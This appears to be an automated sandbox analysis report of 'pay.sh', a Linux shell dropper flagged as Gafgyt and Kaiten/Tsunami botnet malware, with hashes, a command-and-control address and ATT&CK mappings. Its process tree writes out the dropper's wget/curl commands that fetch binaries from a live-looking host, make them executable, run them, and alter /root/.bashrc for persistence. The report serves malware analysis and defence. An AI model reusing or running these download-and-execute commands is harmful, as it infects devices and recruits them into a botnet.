Analysis
-
max time kernel
64s -
max time network
69s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
22-10-2024 16:06
Static task
static1
Behavioral task
behavioral1
Sample
pay.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
pay.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
pay.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
pay.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
pay.sh
-
Size
3KB
-
MD5
cf70ee36f1e9247f2146e4981924d4f4
-
SHA1
7eabae4200118c4e89979658db6e4d905fe3dae9
-
SHA256
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
-
SHA512
60f6bdf8813ee328f747b722e8d8abb8ecd91836a96de7e877217c6794d4dcef56130f3f833f748637b0a7b81bac94ea7e3d9cb3dfff0a2060eab34c20070bd0
Malware Config
Extracted
gafgyt
104.234.24.138:1990
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral3/files/fstream-5.dat family_gafgyt -
Detects Kaiten/Tsunami Payload 2 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_kaiten2 behavioral3/files/fstream-3.dat family_kaiten2 -
Detects Kaiten/Tsunami payload 2 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_kaiten behavioral3/files/fstream-3.dat family_kaiten -
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 806 chmod 733 chmod 759 chmod 792 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/m3cr0 734 m3cr0 /tmp/zigaarch64 761 zigaarch64 /tmp/x00x 793 x00x /tmp/m3cr0 807 m3cr0 -
Creates/modifies environment variables 1 TTPs 1 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /root/.bashrc pay.sh -
Modifies Bash startup script 2 TTPs 1 IoCs
description ioc Process File opened for modification /root/.bashrc pay.sh -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/zigaarch64 wget File opened for modification /tmp/zigaarch64 curl File opened for modification /tmp/x00x curl File opened for modification /tmp/bash.sh wget File opened for modification /tmp/bash.sh curl File opened for modification /tmp/m3cr0 wget File opened for modification /tmp/m3cr0 curl File opened for modification /tmp/x00x wget File opened for modification /tmp/m3cr0 curl File opened for modification /tmp/m3cr0 wget
Processes
-
/tmp/pay.sh/tmp/pay.sh1⤵
- Creates/modifies environment variables
- Modifies Bash startup script
PID:698 -
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr02⤵
- Writes file to tmp directory
PID:702
-
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/chmodchmod +x m3cr02⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/m3cr0./m3cr02⤵
- Executes dropped EXE
PID:734
-
-
/bin/rmrm -rf m3cr02⤵PID:737
-
-
/bin/rmrm -rf m3cr0.12⤵PID:739
-
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch642⤵
- Writes file to tmp directory
PID:740
-
-
/usr/bin/curlcurl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:750
-
-
/bin/chmodchmod +x zigaarch642⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/zigaarch64./zigaarch642⤵
- Executes dropped EXE
PID:761
-
-
/bin/rmrm -rf zigaarch642⤵PID:763
-
-
/bin/rmrm -rf zigaarch64.12⤵PID:765
-
-
/usr/bin/wgetwget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x2⤵
- Writes file to tmp directory
PID:766
-
-
/usr/bin/curlcurl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/chmodchmod +x x00x2⤵
- File and Directory Permissions Modification
PID:792
-
-
/tmp/x00x./x00x2⤵
- Executes dropped EXE
PID:793
-
-
/bin/rmrm -rf x00x2⤵PID:795
-
-
/bin/rmrm -rf x00x.12⤵PID:796
-
-
/usr/bin/wgetwget http://floodernetwork111.accesscam.org:8089/bash.sh2⤵
- Writes file to tmp directory
PID:797
-
-
/usr/bin/curlcurl -O http://floodernetwork111.accesscam.org:8089/bash.sh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/rmrm -rf bash.sh.12⤵PID:802
-
-
/bin/bashbash bash.sh2⤵PID:801
-
/usr/bin/wgetwget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr03⤵
- Writes file to tmp directory
PID:803
-
-
/usr/bin/curlcurl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr03⤵
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/chmodchmod +x m3cr03⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/m3cr0./m3cr03⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm -rf m3cr03⤵PID:809
-
-
/bin/rmrm -rf m3cr0.13⤵PID:810
-
-
/bin/sleepsleep 60003⤵PID:811
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Privilege Escalation
Boot or Logon Autostart Execution
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
236B
MD58bbe815474c7d3ed318e958c05e1c95b
SHA136235a707a29d27b01570ef8c973c522f563c15c
SHA256469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b
SHA512137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f
-
Filesize
983KB
MD575c00b238bd8105414cbb5d08601ca1a
SHA12a5e59555f348bfd9fa9fc4e3e04338ee4e74576
SHA256edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361
SHA512a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5
-
Filesize
985KB
MD5f042a9131a6d06671e98c1ed1f8d80a8
SHA1dd97fac87e8d4a973dc4867524908f3384916f27
SHA256a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c
SHA512629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe
-
Filesize
73KB
MD548ea3c3566c796e4f74e8e3d6df15cd3
SHA1b1ef1574ced09471c26a4c749d5a4ab5ba7942cd
SHA25679b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a
SHA512cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd